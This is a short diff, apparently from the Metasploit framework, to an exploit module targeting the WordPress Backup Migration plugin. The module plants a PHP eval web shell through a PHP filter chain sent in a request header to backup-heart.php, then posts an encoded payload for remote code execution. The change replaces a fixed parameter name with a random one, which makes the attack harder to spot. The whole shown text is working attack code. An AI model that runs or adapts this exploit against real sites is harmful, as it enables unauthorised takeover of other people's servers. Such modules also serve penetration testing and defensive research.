Random parameter generation

Author: Chocapikk

modules/exploits/multi/http/wp_backup_migration_php_filter.rb

@@ -110,7 +110,8 @@ def php_exec_cmd(encoded_payload)
   def exploit
     print_status('Sending the payload, please wait...')
 
-    php_code = "<?php eval($_POST['0']);?>"
+    random_var_name = Rex::Text.rand_text_alpha_lower(8)
+    php_code = "<?php eval($_POST['#{random_var_name}']);?>"
     php_filter_chain_payload = generate_php_filter_payload(php_code)
     phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
     b64_payload = framework.encoders.create('php/base64').encode(phped_payload)
@@ -119,7 +120,7 @@ def exploit
       'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'backup-backup', 'includes', 'backup-heart.php'),
       'method' => 'POST',
       'headers' => { 'Content-Dir' => php_filter_chain_payload },
-      'data' => "0=#{b64_payload}"
+      'data' => "#{random_var_name}=#{b64_payload}"
     )
   end
 end